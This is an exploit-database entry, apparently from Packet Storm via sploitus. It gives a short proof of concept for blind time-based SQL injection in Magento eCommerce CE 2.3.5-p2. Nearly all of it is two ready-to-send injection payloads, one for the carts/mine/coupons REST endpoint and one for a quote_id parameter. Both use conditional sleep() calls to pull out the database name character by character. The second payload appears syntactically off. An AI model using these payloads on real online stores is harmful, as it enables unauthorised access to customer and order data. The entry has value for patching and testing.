Share
## https://sploitus.com/exploit?id=PACKETSTORM:167015
# Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi  
# Date: 2021-4-21  
# Exploit Author: Aydin Naserifard  
# Vendor Homepage: https://www.adobe.com/  
# Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2  
# Version: [2.3.5-p2]  
# Tested on: [2.3.5-p2]  
  
POC:  
  
1)PUT  
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23  
  
2)POST /cargo/index/validateqty  
[quote_id parameter]  
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23